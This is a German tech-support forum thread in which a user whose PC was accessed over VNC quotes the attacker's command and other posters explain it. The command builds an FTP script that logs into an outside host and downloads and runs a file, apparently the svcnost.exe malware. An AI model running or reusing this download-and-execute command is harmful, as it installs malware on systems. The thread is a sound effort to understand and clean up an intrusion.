Isrealischer Hacker an Board ...

  • #1
D

DjNetwork

Neues Mitglied
Themenersteller
Dabei seit
25.05.2011
Beiträge
3
Reaktionspunkte
0
Hallo und schönen guten morgen ...

hab ein kleines Problem, und zwarhabe ich gestern durch zufall gesehen, wie sich jemand aus Isreal (laut IP-Adresse) per VNC auf meinem Rechner eingeloggt hat und folgende Befehlszeile ausgeführt hat:

cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo >> ik &echo bye >> ik &ftp -n -v -s:ik & ik & &exit

Und jetzt habe ich glaub ich einige Fragen ...
1. Kann mir jemand sagen, was dieser Befehl bewirkt?
2. Kann ich nachvollziehen, ob - und wenn ja was - per FTP, oder wie auch immer von meinem Rechner hochgeladen wurde?
Soweit ich das gesehen habe, hatte der Junge nur ca. 2 min Zeit... Aber in 2 Minuten können die ja schon ne menge anstellen ...
3. die Datei svcnost.exe gibt es doch gar nicht, oder ? Hat der sich da verschrieben, oder war das absicht??

Wäre klasse wenn Ihr mir weiter helfen könntet ...


lg DjNetwork

[blue]einige Teile des kompletten Codes aus Sicherheitsgründen entfernt[/blue]

[br][blue]*PCDpan_fee: Verschoben aus "Windows XP"*[/blue]
 
  • #2
Im Prinzip versucht der Befehl eine Datei von einem ftp herunterzuladen.
Ich hab mal einen Screenshot gemacht von dem, was als Rückmeldung kommt von einem PC, der nicht im Internet hängt.
 
  • #5
ups ... hatte im Task-Manager immer nur den svchost gesehen, daher dacher ich er war darauf aus :-D ... na gut. Google ist ne alternative :-D nächstes mal wieder ;-)
aber trotzdem Danke ...

ähm, ja... also schau ich mir am besten mal diese dumme datei an ...

melde mich gleich wieder ;-)
[br][br]Erstellt am: 25.05.11 um 10:56:35
[br]okee... der Grund dafür, das ich dachte die Datei gäbe es nicht, hängt ja auch damit zusammen, das ich sie anhand der Suchfunktion gestern nicht gefunden habe ;-)

Iss mir grad so eingefallen, wie ich danach gesucht habe :-D ... Ja, also der Typi hat die gelöscht. (war auch ein teil des Befehls)

muss ich mir da jetzt Gedanken machen? anscheinend (So wie ich den einen Link verstanden habe) iss die Datei ja nicht so dringend nötig. Oder habe ich vielleicht grad noch glück gehabt, das ich den Vogel rechtzeitig rauskicken konnte ?! Vielleicht wollte er sie ja austauschen gegen irgendwas anderes?

Oh man.. ich krich echt ne kriese ...
 
  • #7
schau mal, ob du die Datei unter
C:\Users\Dein_Username\AppData\Roaming\xssend2\svcnost.exe
findest
bzw. unter Windows XP unter
C:\Dokumente und Einstellungen\Dein_Username\Anwendungsdaten\xssend2\svcnost.exe
(xssend2 = kann auch anders lauten)
z.B.
C:\Dokumente und Einstellungen\Dein_Username\Anwendungsdaten\xbcicu1qog3qsxxx\svcnost.exe

Die Datei kann auch im system32-Verzeichnis liegen.

Anwendungsdateien muss du erst sichtbar machen.
Siehe:



pan_fee
 
  • #8
ja, habe ich gestern schon gelesen. VNC zu deaktivieren gestaltet sich bei mir aber etwas schwieriger. Brauche dieses dummer Programm...
Im Router sind jetzt auf jeden Fall erstmal alle Ports geschlossen. VNC habe ich mit einem erheblich umfangreicheren Passwort geschützt. Aber muss ich sonst noch andere Passwörter ändern ? Auf was kann der alles zugegriffen haben?
Den obigen Befehl habe ich aus der Ausführen-Box beim Start-Button ... Sonst stand da nix weiter drin, außer cmd... aber wie kann ich nachvollzeiehen, ob der vielleicht noch andere Sachen gestartet hat? Weil z.B. unter meinen eigenen Dateien dann doch sachen bei sind, die vielleicht in einer fremden hand nicht so toll sind...
[br][br]Erstellt am: 25.05.11 um 11:18:48
[br]Nein, deine angegebenen Ordnernamen habe ich alle nicht, aber die Datei ist auch nicht in dem Ordner anwenungsdaten vorhanden. Habe eben alles manuell durchsucht und die Suchfunktion (inkl. versteckter Dateien) auch genutzt. Habe die Datei nicht mehr ...
 
Thema:

Isrealischer Hacker an Board ...

ANGEBOTE & SPONSOREN

Neueste Themen

Statistik des Forums

Themen
113.840
Beiträge
707.963
Mitglieder
51.494
Neuestes Mitglied
Flensburg45
Oben